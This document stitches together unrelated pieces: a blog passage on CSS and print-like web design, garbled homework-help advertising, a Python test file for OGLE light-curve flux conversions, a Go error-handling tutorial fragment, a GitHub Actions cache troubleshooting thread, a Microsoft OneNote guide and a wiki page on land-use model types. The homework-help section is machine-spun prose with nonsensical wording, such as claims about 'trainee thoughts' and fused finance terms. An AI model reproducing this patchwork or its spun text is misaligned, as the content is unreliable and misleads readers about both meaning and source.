On occasion I’d try really hard to implement these print-like ideas. Many other people did too – it’s why we fragmented designs into tiny pieces to reconstruct with tables. It’s why we ended up with things like sIFR. Horrible hacks, but as a community we were pushing at the edges of what was possible. Demonstrating what we wanted in code that made the best of what we had available. While I muttered under my breath about the web not being print, some of my most enjoyable front-end coding challenges came from trying to implement those designs.
I feel as if something changed as the web became the core of business operations. It manifested in the creation of boilerplates, themes, frameworks. It became unfashionable to start designs in Photoshop, instead designs originated in a web browser, and so were designed with the limitations of that medium front and centre. They became easier and quicker to build, I might have to rebuild in production code the HTML and CSS prototype but the decisions were about methods – there was never the possibility that I might be trying to build something impossible.
Somehow the tables have turned. As the web moves on, as we get CSS that gives us the ability to implement designs impossible a few years ago, the web looks more and more like something we could have built with rudimentary CSS for layout. We’ve settled on our constraints and we are staying there, defined by not being print. Or defined by the constraints of layout methods designed for far simpler times.
When I started demonstrating CSS Shapes, Regions and Exclusions at conferences I would get people in the Q&A or coming up to me afterwards very worried (and sometimes furious) about these print-like things appearing in a browser. The web is not print, they would say. I never got a reply as to why print influence was a problem, it was as if print sneaking into their web platform was undermining some core truth.
No, the web is not print. However it shouldn’t be defined by being not print. Nor should we allow assumptions about what is and isn’t possible stop us experimenting. Unless we find the edges, unless we ask why we can’t do things, unless we come up with ways to try and make it work, the native tools won’t get better.
It’s for this reason that I love the work that Jen Simmons does, digging into the design possibilities new CSS brings and getting people excited about that. It’s also why I love the idea behind Houdini, that effort to open up the mysterious bits of CSS and provide sensible APIs. I love the excitement I see from audiences when I show them things like CSS Grid Layout. I hope we’ll see interesting possibilities take shape in code, as people realise they can code their way past the limitations of the existing platform.
The web has come a long way in those 20 years and I’ve been privileged to come along for the ride. I can’t wait to see, and to be part of what comes next.
|
OPCFW_CODE
|
One among my close friends suggested me allassignmenthelp.com and I used to be so delighted that he did so. I took assistane with my final year dissertation and compensated a reasonable rate with the company. I'd personally propose you fellas to my friends.
Our expert services involve object oriented and purposeful programming help online. There is nothing unattainable for our team of professional programmers.
If you buy homework help therefore you’re not pleased with the quality of the solution received, allow us to know and We'll ship you an entire refund if warranted.
Presently, people devote most of their online time with their faces buried in their Internet browsers. A browser-centered Device could verify very handy — so Why don't you try developing among your own private as a way to dietary supplement your learning?
Professional: LogicPro replied one year ago. Just posted The solution LinkLet me know as soon as you bought it Please consider adding reward can check with me all over again working with "For LogicPro only" At the beginning of your inquiries like other customers for getting quick answers.
Acquiring help is not difficult! Pick out when you would like to obtain the solution, compose any opinions you have and upload any files that are important.
Up coming it will eventually check the classifier on Each and every portion by passing the classifier p-one on the elements of data in schooling and another element in exam. It will Look at the labels the classifier returns from the actual labels stored in facts to deliver a score review for that partition. It is going to sum the scores throughout all p partitions and then divide this by m. This range may be the estimate of your classifier’s effectiveness on info from this resource. It really should return this selection (between 0 and one).
Our online authorities who give monetary management project help to college students cover areas inside the subject with multidimensional approaches. The financial Concepts like micro and macroeconomics are directly purposeful With all the fiscal administration approaches.
A constructor that will take a temperature of style double as well as a char symbolizing the size. The valid scale values are:
C Programming Project Help Hi! I am offering my solutions to help you debug your software free of charge This is certainly to incorporate to my programming expertise and help pupils (or staff) to provide a powerful application.
I took aid for my Marketing and advertising Approach assignment and tutor produce a superbly prepared advertising prepare 10 times prior to my submission day. I acquired it reviewed from my professor and there were only smaller variations. Wonderful work guys.
For those who have labored on Python or Ruby then, PHP will not be difficult to cope with. Secondly, it's the most widely utilised normal reason programming and has turned how people checked out the online
Money administration and accounting also comprises on the fiscal facts in the organization concern for accounting information. Our online tutors offer finance homework help to pupils nicely inside the deadline. In The traditional times, the two economic administration and ebook maintaining were considered as identical and afterwards later on they acquired fused into administration accounting considering that this component is very much supportive to finance supervisor to take conclusions.
Our goal should be to de-strain the trainee thoughts by providing the prompt assignment aid.Our most important focus is never to feed trainees Using the company to attain passing marks.We purpose to supply providers that can be utilized for a layout response to enhance analysis correcting capacity of the scholar.
|
OPCFW_CODE
|
import copy
import numpy as np
from caustic.data import OGLEData
np.random.seed(42)
event = OGLEData("data/OGLE-2017-BLG-0324")
def test_convert_data_to_fluxes():
"""Tests the consistency between conversion to fluxes and magnitudes."""
event_initial = copy.deepcopy(event)
event.units = "fluxes"
event.units = "magnitudes"
# Iterate over bands
for i in range(len(event_initial.light_curves)):
assert np.allclose(
event_initial.light_curves[i]["mag"], event.light_curves[i]["mag"]
)
assert np.allclose(
event_initial.light_curves[i]["mag_err"], event.light_curves[i]["mag_err"]
)
def test_magnitudes_to_fluxes():
"""
Tests weather the analytic expressions for the mean and root-variance
of the flux random variables are correct by simulating samples from a
normal distribution.
"""
# Iterate over bands
for i, table in enumerate(event.light_curves):
m = np.array(table["mag"])
sig_m = np.array(table["mag_err"])
# Sample multivariate normal distribution with those parameters
m_samples = np.random.multivariate_normal(m, np.diag(sig_m ** 2), size=10000)
F_samples = 10 ** (-(m_samples - 22) / 2.5)
mu_F = np.mean(F_samples, axis=0)
std_F = np.std(F_samples, axis=0)
event_copy = copy.deepcopy(event)
event_copy.units = "fluxes"
assert np.allclose(
mu_F, np.array(event_copy.light_curves[i]["flux"]), rtol=1.0e-02
)
assert np.allclose(
std_F, np.array(event_copy.light_curves[i]["flux_err"]), rtol=1.0e-01
)
def test_get_standardized_data():
"""Standardized data should have zero median and unit std dev."""
std_tables = event.get_standardized_data()
# Iterate over bands
for i, table in enumerate(std_tables):
assert np.allclose(np.median(table["flux"]), 0.0)
assert np.allclose(np.std(table["flux"]), 1.0)
|
STACK_EDU
|
Let me walk through the above example one point at a time. First, we created the HttpError struct which has status and method fields. By implementing Error method, it implements the error interface. Here, Error method returns a detailed error message by using status and method values.
GetUserEmail is a mock function which is designed to send an HTTP request and return the response. But for our example, it returns empty response and an error. Here error is a pointer to the HttpError struct with 403 status and GET method fields.
Inside the main function, we call GetUserEmail function which returns the response string (email) and an error (err). Here, the type of err is error which is an interface. From the interfaces lesson, we learned that to retrieve the underlying dynamic value of an interface, we need to use type assertion.
Since the dynamic value of the err has *HttpError type, henceerrVal := err.(*HttpError) returns a pointer to the instance of the HttpError. Hence, errVal contains all the contextual information and we extract this information and do some conditional operations.
Let’s understand the meaning behind this facade. An error is something that implements the error interface. An interface can represent many different types. Hence any error can have many different types. A type of error returned by errors.New is of *errors.errorString type. Similarly, in the above example, it is of *HttpError type.
Using type assertion syntax which is err.(TypeOfError), we can extract the context of the error which is nothing but the dynamic value of the error err.
In the above example, we have created two error types viz. NetworkError and FileSaveFailedError. The saveFileToRemote function can return any of these errors or nil in the case when error did not occur.
In the main function, using a type switch statement, we extracted the dynamic type and matched against various cases to do conditional operations.
In the above example, we have created a UnauthorizedError struct type, which contains UserId and OriginalError fields. The OriginalError field stores an error. Inside Error method, we are adding context to the original error. %v formatting verb will call Error method on httpErr.OriginalError and inject returned string.
The validateUser returns an instance of UnauthorizedError which contains the original error err which was created using fmt.Errorf function.
Inside the main function, we can call validateUser function and read the error. fmt.Println will call Error method on the err struct which returns an original error message with the context added from err.OriginalError.
Don’t get confused by the above example, it’s very simple to understand. We have an interface type UserSessionState which contains isLoggedIn method and getSessionId method. It also has an embedded interface error which promotes Error method. Hence, UserSessionState can be used as a type that represents an error.
Since UnauthorizedError struct implements both getSessionId and isLoggedIn methods as well as Error method, it implements UserSessionState interface.
In the main function, err has the static type of error but the dynamic type of UnauthorizedError. Since we learned in the interfaces lesson that using type assertion we can convert the dynamic value of an interface to an interface type that it implements.
In line no 51, we are doing exactly the same. Since the dynamic value of err is the type of *UnauthorizedError but since UnauthorizedError implements UserSessionState interface, it returns the static type UserSessionState which has a dynamic value of *UnauthorizedError instance returned from validateUser function.
This way, we can call getSessionId() method on errVal which is an interface of type UserSessionState. Since it has the dynamic value of *UnauthorizedError, we need to use type assertion again to extract it. This has shown in the comment on line no 56.
So far, we have learned how to create an error and how we can add context information to it. If you are coming from other programming languages background, then you would be worried, where is the stack trace?
Stack trace gives us exact information about where the error occurred (or returned) in our code. When an error occurs, a stack trace is a great way to debug your code as it contains the filename and the line number at which the error has occurred and a stack of function calls made until the error occurred.
Unfortunately, Go does not provide the capability to a stack trace to an error.
Here, we need to depend on a Go package published here on GitHub. This package provides Wrap method which adds context to the original error message as well as Cause method which used to extract original error.
You can follow the documentation on how to import this package from their official documentation. This package also provides New and Errorf functions so we don’t need to use built-in errors package.
In the above program, we have created a simple error originalError using New function and provided an error message (line no. 9). To add context information to this error, we used Wrap function from error package (line no. 11). This adds extra information to the original error message as well as adds a stack trace.
If you don’t need to see the stack trace, you can simply print the error using Println or Printf function using %v formatting verb (line no. 15). To extract the stack trace as well as the original error message, we use %+v formatting verb (line no. 18).
To extract the original error, you can use Cause function (line no. 21). Any error which implements causer interface (which contains Cause() error method) can be inspected by the Cause function.
One great feature of Wrap function is if the error passed to this function is nil, then return value will be nil. This is useful in case when you want to wrap and return an existing error, otherwise, we would have to check the error for nil condition in order to add context information manually.
In my opinion, you should only add stack trace to an error which is potentially going to break your program. A logical error like we have seen in the authorization example does not need a track state. But since Wrap method can be used to ammend original error message which is also called as annotating an error, the choice is up to you.
In nutshell, we understood that Go treats an error as a value and want developers to handle it gracefully. Using structs and interfaces, we can create custom errors and using type assertion or type switch we can handle them conditionally. This is a great plan but there is a drawback.
When you ship a package or a module for other people to use, you need to export all the error types so that your consumers can handle them conditionally. If you are making error types a part of your public API, then you have another thing to maintain and worry about. The solution is to avoid error types when you can, if possible.
|
OPCFW_CODE
|
Restrict inbound traffic to only come through Azure Load Balancer
Please can someone advise how to restrict access on port 80/443 to some Azure VMs, so that they can only be access via the public IP Address that is associated to an Azure Load Balancer.
Our current setup has load balancing rules passing through traffic from public IP on 80=>80 and 443=>443, to back end pool of 2 VMs. We have health probe setup on port 80. Session persistence is set to client IP and floating IP is disabled.
I thought the answer was to deny access (via Network Security Group) to internet (service tag) on 80/443. Then add rule to allow service tag (AzureLoadBalancer) on the same ports. But that didnt seem to have an effect. Having read up a little more on this, it seems the AzureLoadBalancer tag is only to allow the health probe access and not specifically inbound traffic from that load balancer.
I have also tried adding rules to allow the public IP address of the load balancer, but again no effect.
I was wondering if I need to start looking into Azure Firewalls? and somehow restrict access
to inbound traffic that comes through that?
The only way I can get the VMs to respond on those ports is to add rules to allowing 80/443 from any to any....
Check if this helps : https://social.msdn.microsoft.com/Forums/azure/en-US/e064ee13-10f0-4748-a729-8b2e918df9a9/azure-loadbalancer-not-working-with-vms-nsg-inbound-rule-with-azureloadbalancer-tag
After reading your question, my understanding is that you have a Public load balancer and the backend VMs also have instance level Public IPs associated with them and hence direct inbound access to the VMs is possible. But you would like to make sure that the direct inbound access to VMs is restricted only via the load balancer.
The simple solution for you to achieve this is by disassociating the instance level public IP of the VMs, this will make the LB public IP as the only point of contact for your VMs.
Keep in mind that the LB is not a proxy, it is just a layer 4 resource to forward traffic, therefore, your backend VM will still see source IP of the clients and not the LB IP, hence, you will still need to allow the traffic at the NSGs level using as source "Any".
However, if your requirement is to enable outbound connectivity from Azure VMs while avoiding SNAT exhaustion, I would advise you to create NAT Gateway, where you can assign multiple Public IP address for SNAT and remove the Public IP from the VM. This setup will make sure that the inbound access is provided by the Public load balancer only and the outbound access is provided by the NAT gateway as shown below:
Refer : https://learn.microsoft.com/en-us/azure/virtual-network/nat-gateway/nat-gateway-resource#nat-and-vm-with-standard-public-load-balancer
https://learn.microsoft.com/en-us/azure/virtual-network/nat-gateway/tutorial-nat-gateway-load-balancer-public-portal
You could also configure port forwarding in Azure Load Balancer for the RDP/SSH connections to individual instances.
Refer : https://learn.microsoft.com/en-us/azure/load-balancer/manage#-add-an-inbound-nat-rule
https://learn.microsoft.com/en-us/azure/load-balancer/tutorial-load-balancer-port-forwarding-portal
Hi gitaranisharma, many thanks for taking the time to provide an answer. Sounds like I was over thinking it and missed what seems like a simple solution! With regards outbound connections, the VM's do need to connect to SQL and also other web services, however we haven't had any issues with snat exhaustion as of yet, so hopefully should be good on that regard (unless your suggestion might effect this?) I will try out your suggestion when back in the office on Monday and confirm your answer as correct then. Many thanks Dean
Thank you for the update. Yes, the solution is simple. Just dis-associate the instance level Public IPs from the VMs and use NAT gateway for the VM's outbound connections. With NAT, individual VMs do not need public IP addresses and can remain fully private. NAT gateway can be assigned up to 16 public IP addresses, with each IP having 64,000 available ports and it provides on-demand SNAT ports for new outbound traffic flows. So you do not need to worry about SNAT port exhaustion.
Refer : https://learn.microsoft.com/en-us/azure/virtual-network/nat-gateway/nat-gateway-resource#on-demand
|
STACK_EXCHANGE
|
On 04/02/2015 at 01:45, xxxxxxxx wrote:
Cinema 4D Version: 14,15,16
Language(s) : C++ ;
I am trying to create a (hidden) cloner object so I can use its surface distribution properties, like retrieving global positions and normals of individual clones.
However, I am getting stuck at the very beginning.
Here is some code:
BaseDocument* doc = node->GetDocument();
BaseObject *clonerObj = BaseObject::Alloc(1018544); // Create a cloner object
if (!clonerObj) return true;
BaseTag *tag = clonerObj->GetTag(ID_MOTAGDATA);
if (!tag) return true; // The tag is not found so the rest is not executed
LONG clCount = msg_data.modata->GetCount();
The only situation that I got working is to search for a cloner object from the scene, but I want to create my own cloner and hide it from the user (if possible).
I tried inserting the cloner into the document and even inserting an object under the cloner, the tag is still not found unless done manually and not programamtically.
Any help would be greatly appreciated.
On 04/02/2015 at 06:36, xxxxxxxx wrote:
there is nothing wrong. When you create the cloner object you do just that – you create the cloner object, nothing else. The cloner hasn't done anything yet. The cloner will only create the MoData tag when it is used inside a scene and it is necessary to create the tag.
If you want to force the cloner to be in such a state you could create a temporal BaseDocument, add the cloner and everything needed to turn it into that state to the document and call the temporal document's ExecutePasses(). Then you can remove the cloner from that document.
On 05/02/2015 at 04:04, xxxxxxxx wrote:
Thank you Sebastian, it works.
Now to my next problem, where I need to set some parameters to the cloner object.
This is the code I used:
clonerObj->SetParameter(DescID(ID_MG_MOTIONGENERATOR_MODE), 0, DESCFLAGS_SET_0);
clonerObj->SetParameter(DescID(MGCLONER_VOLUMEINSTANCES), TRUE, DESCFLAGS_SET_0);
BaseObject *distributionLink = bc->GetObjectLink(LINKEDOBJ,doc);
tempObj = static_cast<BaseObject*>(distributionLink->GetClone(COPYFLAGS_0, NULL));
doc->InsertObject(tempObj , NULL, NULL, NULL);
clonerObj->SetParameter(DescID(MG_OBJECT_LINK), tempObj , DESCFLAGS_SET_0);
clonerObj->SetParameter(DescID(MG_POLY_MODE_), 3, DESCFLAGS_SET_0); // Surface distribution mode
doc->InsertObject(clonerObj, NULL, NULL, NULL); // This inserts the cloner with the proper parameters set with a default total of 20 clones
BaseTag *tag = clonerObj->GetTag(ID_MOTAGDATA);
int clCount = msg_data.modata->GetCount();
//Get the positions of the clones in the cloner object
MoData *md = msg_data.modata;
MDArray<Matrix>mtx = md->GetMatrixArray(MODATA_MATRIX);
MDArray<LONG>farr = md->GetLongArray(MODATA_FLAGS);
for (int i=0; i<clCount; i++)
printVector(mtx[i].off); //this is a custom print function for vectors
The problem is that it always return the original 3 positions of a default cloner, without taking into account the surface distribution mode. Anything I need to do to update the output to use the current cloner parameters?
On 05/02/2015 at 04:34, xxxxxxxx wrote:
as said before, the cloner object itself won't do anything on its own. Only if it is part of a document and that document is executed, the cloner will do it's work, create clones and edit the MoData.
For further questions on different topics please open a new thread for each question. Thanks.
On 05/02/2015 at 05:03, xxxxxxxx wrote:
I finally got it working. The problem was coming from the insertion of the cloner into the active document (which I was using for debugging). Once I omitted the insertion I got the proper count output.
Thanks again for your help.
On 05/02/2015 at 14:30, xxxxxxxx wrote:
A follow up question if I may.
The temporary document solution works in case I was executing the command once. However, once I remove the cloner from the temporary document, I can no longer modify its parameters.
The situation is like this: I am creating an object plugin where I am using a hidden cloner to distribute clones over a surface. I want to change the clone count in GVO obviously. This is not updating since it's running outside the temporary document.
tempdoc->InsertObject(clonerObj, FALSE, FALSE);
//Any parameter set here works
clonerObj->InsertUnder(doc); // Inserting the cloner back into the main document
//Parameters set outside the tempdoc do not work
clonerObj->SetParameter(DescID(MG_POLYSURFACE_COUNT), 5, DESCFLAGS_SET_0); //does not work
So the question is: how do I make it work in GVO, so it's interactive.
On 06/02/2015 at 07:24, xxxxxxxx wrote:
I guess with "GVO" you mean GetVirtualObjects()?
To insert an object into a document you don't use InsertUnder(); use InsertObject() instead. And as I said, it is not enough for an object to be in an document. Functions like GetVirtualObjects() are only called when that document is evaluated. Depending on the object in question, just chaining a parameter value won't cause any action of that object.
When you write a generator that creates objects, these objects are not added to the document using InsertObject(). Instead, a generator creates a cache. The content of that cache is defined by the object (and it's children) returned by GetVirtualObjects().
For questions no longer related to this thread's original topic, please open a new thread. Thanks.
|
OPCFW_CODE
|
Does one eye of Lord Shiva always remain open?
The three eye God is famous for his penance most. At time of penance his eyes remain close and time duration of his penance is also extremely long. But I heard an incident in which Parvati asked Shiva to close his eyes. Then whole universe turned dark. Even Sun's light turned off. Then Shiva did open his third eye and all universe become light up again. He didn't open his two eyes because Paravati asked to close them but didn't say anything about third eye so Shiva opened that eye.
Then Parvati was also suprised by seeing that Shiva opened his third eye. She asked to open his eyes again. Then he closed his third eye only after open his primary two eyes.
Parvati asked to Shiva, Why you open your third eye? What was need to open it? Then Shiva told, It can never happen when I close my all eyes from this world. I have to always keep one eye open to see the world. I can't turn my eye off from this world. If in any case I have to close my eyes for some reason then its becomes mandatory to open my third eye.
If this is really true then what about time of penance? On penance he sure remains close his two eyes but is third eye remain open when Shiva does penance? Do scriptures says something about his third eye? Is it true Shiva keep one eye open even in penance? Or penance is exception?
What penance you are talking about? After separation from Sati? Exact story of Parvati devi closing eyes can be found in this answer.
@thedestroyer I am not talking about any particular special penance. I mean whenever Shiva do penance then one eye remain open? And I am talking about fourth incident in mentioned question.
If i understand your question correctly, you are asking "why world doesn't become black when Shiva stays in yogic padmanasana posture with closed eyes "? (this is how Shiva is generally depicted in many pictures)
@thedestroyer Yes, kind of this is what I am asking. But I was asking in different way. I means, after hearing this story I came to know that Shiva keep one eye open always. So question can be consider in two ways. First way (in which I asked) is, Do Shiva keep one eye open in penance also? Or other way (as you figured) is, why world don't turn dark when he keep all eyes close during penance? Whether we ask in any way but answer will remain say. So you can consider my question in any way since answer will be same :)
@moonstar2001 It depends, focus is done either on the tip of the nose or on Ajna Chakra.
I don't understand the question as well. I assume you are talking about meditation or yogic posture. Well, I think Lord Shiva never close his eyes.
Most of the time, when people think of meditation, they think of closing their eyes and after some time they create random imaginations which keeps on shifting from one position to another. Meditation means not to be affected by outside world. It does not want us to be blind. When you close your eyes then you will probably start visualizing. This visualization looks very nice (full of bright colors). This visualization is nothing but an imagination. You are making yourself blind and getting into a state of hibernation (sleep).
Meditation or penance is done by opened eyes or half-opened eyes. You should meditate by becoming fully awake. To do this, you half-close your eyes and look at the tip of your nose. After that you don't move your eyes, your eye balls e.t.c.
Even In Bhagavat Gita Lord Krishna Says In Chapter VI Verse 12-13,
तत्रैकाग्रं मन: कृत्वा यतचित्तेन्द्रियक्रिय: |
उपविश्यासने युञ्ज्याद्योगमात्मविशुद्धये || 12||
समं कायशिरोग्रीवं धारयन्नचलं स्थिर: |
सम्प्रेक्ष्य नासिकाग्रं स्वं दिशश्चानवलोकयन् || 13||
Seated firmly on it, the yogi should strive to purify the mind by focusing it in meditation with one pointed concentration, controlling all thoughts and activities. He must hold the body, neck, and head firmly in a straight line, and gaze at the tip of the nose, without allowing the eyes to wander.
http://www.holy-bhagavad-gita.org/chapter/6/verse/12-13
Similar interpretation from other site,
Sloka
6.13
Let him firmly hold his body, head and neck erect and still, (with the eye-balls fixed, as if) gazing at the tip of his nose, and not looking around. 13
You are saying opposite of Bhagwat Geeta. Lord Krishna said in BG that to do meditation one need to close his eyes. Because if we keep our eyes open then by seeing views of world we will surely get distract. Closing your eyes helps to avoid distraction.
I am not saying opposite, I am actually telling the best way. You can of course close your eyes, but the way to do it is by concentrating on the tip of your nose or by the looking at the center area (between the eyebrows), and to do this you will have to slightly open your eyes. Please read the sloka above.
|
STACK_EXCHANGE
|
How To Use Microsoft OneNote
Microsoft OneNote eliminates the risk of losing or misplacing your notes and reminders, by allowing the user to collate all of these notes on a single online database. Use Microsoft OneNote to digitally write down those notes on the go and never run out of ink and paper.
Download the How to Use Microsoft OneNote Article in PDFDownload
How To Use Microsoft OneNote
Microsoft OneNote is a free note-taking software created by Microsoft as a way to take down notes and collate both screenshots and recorded audio. This software is quite similar to another program named Microsoft Word, which is developed by the same company; beginners can begin familiarizing themselves with Microsoft OneNote by following these steps:
Step 1: Open or Create a Notebook
Microsoft OneNote requires the users to write down their notes on tabs called Notebooks. When opening Microsoft OneNote for the first time, a Notebook labeled “My Notebook” will be automatically made, which the user can immediately use by clicking the tab “My Notebook”. But if they want to create or add a new notebook in Microsoft OneNote, then they should click the button “Add notebook” which will open up a dialogue box where the user can name or label their Notebook.
Step 2: Open or Add a Section
Sections are subcategories that hold pages within them where the user can type down their notes, and store their media. The user can access their collection of sections by clicking the space on the right side of the window. Afterward, they may either open a section by clicking what they wish to open. Alternatively, if the user wants to make a new section then they may click the “Add section” button located in the bottom left corner of the window which opens a dialogue box where the user may name the section.
Step 3: Open or Add a Page
A page is a place where the user may write down their notes, add or draw images, store their recordings and videos, and even draw various pictures or symbols. The user may open an existing page by clicking a Section and then the Page they want to open. If they opt to create a new page, they instead click the “Add page” button located in the bottom left corner of the window.
Step 4: Format the Text
Before the user writes down their notes, they need to keep track of what format they want their typeface to have. If the user wants to customize and style their notes, the toolbar on the upper corner of the window has a variety of ways to modify the format and look of your text.
Step 5: Write Down the Notes
The page is now primed for note-taking. The user may begin by writing down a title for the page located just below the toolbar on the right. Then the user can type out any notes they wish to input on the page.
Step 6: Adding Media
If the Page is feeling plain or if the user needs to add various images, videos, and recordings to the note, OneNote’s got you covered. To add various media to the page, click the “Insert Tab” located on the header above the toolbar. This tab will allow the user to insert various files, images, links, tables, audio, and more.
How many notebooks should I have in OneNote?
OneNote allows the user to have as many notebooks as they want.
How do I use OneNote as a daily journal?
You can do this by creating a Notebook and dividing it into specific Sections, then writing down pages whenever you want to log something.
How do you create a notebook?
The user can create a notebook by clicking the “Add notebook” button on the lower-left corner of the window.
Is OneNote good for journaling?
Yes, OneNote allows the user to indefinitely add more pages and sections while still being easy to use.
When should I use OneNote vs Word??
The user should use OneNote when writing down notes as it allows the user to collate and compile their writings, while Word is used to create official documents and letters.
|
OPCFW_CODE
|
Path Validation Error when caching on container jobs
When I use the cache action with a container job, the cache is not saved during the post cache step and instead I get the following error
Post job cleanup.
/usr/bin/docker exec ecc19d4d[2](https://github.com/daoudi-mohammed/spring-boilerplate/runs/6771275062?check_suite_focus=true#step:10:2)b410eadd[3](https://github.com/daoudi-mohammed/spring-boilerplate/runs/6771275062?check_suite_focus=true#step:10:3)082d7a7d5d22cc782f29dfba69ac4a8edc83090a10843c sh -c "cat /etc/*release | grep ^ID"
Warning: Path Validation Error: Path(s) specified in the action for caching do(es) not exist, hence no cache is being saved.
Here is the code for my job
jobs:
unit-tests:
runs-on: ubuntu-latest
container: openjdk:17-jdk-alpine
steps:
- name: Setup git
working-directory: ""
run: |
apk add -q --no-cache --no-progress git yq tar
git config --global --add safe.directory $GITHUB_WORKSPACE
- name: Check out repository code
uses: actions/checkout@v2
- name: Cache maven packages
uses: actions/cache@v3
with:
path: |
${{ github.workspace }}/.m2/repository
key: test
- name: Run liquibase update
run: |
mkdir -pv ${{ github.workspace }}/.m2/repository/
echo "hello" > ${{ github.workspace }}/.m2/repository/hello.txt
I tried replacing the ${{ github.workspace }} with it's exact value (absolute path) but nothing worked.
However when I use a hardcoded path that has nothing to do with ${{ github.workspace }} it works
with:
path: |
/test/.m2/repository
key: test
- name: Run liquibase update
run: |
mkdir -pv test/.m2/repository/
echo "hello" > test/.m2/repository/hello.txt
Hi @Iduoad
Few questions for you.
Are you using windows image? What all images are you facing this issue on?
What is the size of cache that's getting generated for you when you're hardcoding the path? Can you please share the logs?
Thanks for sharing the info @Iduoad
I used the workflow you shared with and without ${{ github.workspace }}
I was able to run without any issues with ${{ github.workspace}} , here's my workflow file and corresponding run with
debug logs
Then I tried replacing the ${{ github.workspace}} path with hardcoded paths as you suggested -
path: |
/test/.m2/repository
key: test
- name: Run liquibase update
run: |
mkdir -pv test/.m2/repository/
echo "hello" > test/.m2/repository/hello.txt
Here's my workflow file and corresponding run with debug logs after replacing ${{ github.workspace}} with hardcoded values . However this time I got the error that you mentioned -
Warning: Path Validation Error: Path(s) specified in the action for caching do(es) not exist, hence no cache is being saved.
Then I realised that you are using /test in the path for Cache maven packages whereas the Run liquibase update runs in current working directory with test/... without / before the test. In other words /test is present at the root directory of your image whereas test/... is present in current working directory of your image. The current working directory is usually /home/runner/work/repo-name/repo-name so test/... would actually be /home/runner/work/repo-name/repo-name/test/... resulting into the following error -
As you can see Cache Paths is having [] an empty array here because the path mentioned doesn't exist.
To confirm that, I ran the hardcoded workflow again, but this time without the / root reference /test. Here's my workflow file and corresponding run with debug logs with test for the same.
As you can see below, this time the paths were found and cache was saved successfully.
Please check the workflows and their outputs and let me know if you see any issues in the executions I've done based on the info you've provided. If everything seems correct, please validate your actual workflow files for any typo or / root references.
The Path Validation Error warning you have received is a recent implementation done to avoid empty cache saves. And this also helps users realise that the paths they've provided might not have any content at all if provided incorrectly.
Do let me know your findings, happy to help! :)
Thank you @kotewar for the detailed description.
The only difference is that I run a container job like I mentioned before.
Sorry if that wasn't clear. I edited the issue's description to mention that.
Here is the workflow file
jobs:
unit-tests:
runs-on: ubuntu-latest
container: openjdk:17-jdk-alpine
steps:
- name: Setup git
working-directory: ""
run: |
apk add -q --no-cache --no-progress git yq tar
git config --global --add safe.directory $GITHUB_WORKSPACE
- name: Check out repository code
uses: actions/checkout@v2
- name: Cache maven packages
uses: actions/cache@v3
with:
path: |
${{ github.workspace }}/.m2/repository
key: test
- name: Run liquibase update
run: |
mkdir -pv ${{ github.workspace }}/.m2/repository/
echo "hello" > ${{ github.workspace }}/.m2/repository/hello.txt
Let me check the behaviour with openjdk:17-jdk-alpine and get back to you.
Here's the difference after using openjdk container.
The search path is getting evaluated to -
Search path '/__w/learning-actions/learning-actions/.m2/repository'
whereas the given path in action is - /home/runner/work/learning-actions/learning-actions/.m2/repository
[Workflow file](https://github.com/kotewar/learning-actions/actions/runs/2460328311/workflow) [logs](https://github.com/kotewar/learning-actions/runs/6790248919?check_suite_focus=true)
I need to find out why the value of `${{ github.workspace }}` needs to be `/__w` in case of `openjdk:17-jdk-alpine` container.
Note - I've used previous version v3.0.2 of @actions/cache hence its not giving any error message, but also it would be storing and restoring empty cache as nothing exists at the path provided.
This is a mixed scenario where the workflow is running on ubuntu image sometimes, and on the container the rest of the times. That's why ${{ github.workspace }} is sometimes evaluated as /__w and /home/runner/work/repo-name/repo-name the rest of the times. To investigate the issue, we went ahead to understand the behaviour of actions when ran in a container. If interested to know, please refer the workflow and run executed to understand the same. The logs will give you a better idea of the same.
To conclude our understandings, here's what we found -
Containers will always have ${{ github.workspace }} as /__w. If anything is running with /home/runner/work/repo-name/repo-name as current working directory, its outside your container in the ubuntu-latest image (or base image for that matter).
To run actions cache inside the container for java application, the appropriate location of .m2 folder must be known. After investigation, it turns out that .m2 folder in openjdk:17-jdk-alpine is actually present at /root/.m2/repository location. So this should actually be the path that must be used to cache the /.m2/repository folder. Refer this
After the /.m2 folder is located, it should be referred in path parameter of the cache action.
Sample code to get .m2 folder location and setting it in the appropriate location.
- id: cache-path
run: |
echo "::set-output name=dir::$(mvn help:evaluate -Dexpression=settings.localRepository | grep 'm2/repository')"
- name: Cache maven packages
id: cache
uses: actions/cache@v3
with:
path: |
${{ steps.cache-path.outputs.dir }}
key: test_100
Please try using this and see if you get the expected results. You can refer this workflow.
Hope this helps! 😊
It definitely helps! Thank you so much @kotewar
|
GITHUB_ARCHIVE
|
Land use-transport model types
More pages in this category:
# Land Use Model Types
As in any field of science that is developing over several decades, various different model designs have been proposed over the course of the years. The predominant types are listed below, with examples of categories provided in parenthesis.
- Aspatial (Forrester’s Urban Interactions)
- Gravity (Lowry, DRAM/EMPAL)
- Entropy (Wilson's Entropy Model)
- Sketch planning (WhatIf, I-PLACE^3^S, U-PLAN, CommunityViz)
- Discrete choice (DELTA, IRPUD)
- Cellular Automata (LEAM)
- Input/Output style (MEPLAN, TRANUS, PECAS)
- Microsimulation (UrbanSim, SILO)
Even though Forrester's aspatial has not been applied widely, it was a milestone of urban modeling that stimulated the development of further land use models. The gravity model has been popular for its simplicity over decades, and some regions apply derivates of gravity models even today. Wilson's entropy model has been further developed many times, though it remained an academic exercise for most part. Sketch planning models are used widely as planning support systems to date. They commonly do not integrate with travel demand models, but rather serve to visualize various assumptions of growth distributions. Discrete choice models simulate spatial decisions (such as household move, business relocation or the location choice for a developer) explicitly, rather than estimating the emerging outcome on the aggregate. Cellular Automata models do the opposite. Those models estimate the change of raster cells based on characteristics of neighboring raster cells. The underlaying decisions of single households that may lead to population growth is commonly not analyzed by Cellular Automata.
The most prominent modeling concepts in operation today are models that follow the Input/Output model paradigm or are built as microsimulation models. It should be noted that there is some overlap between these categories. For example, many microsimulation land use models follow the discrete choice paradigm. Some Input/Output style models include microsimulations for selected aspects of the model. However, the majority of models can be grouped by these land use model types.
Although the basic design structure is similar for many land use models, there are at least three fundamental design features handled differently in various land use models:
# Behavioral or structure-explaining approach
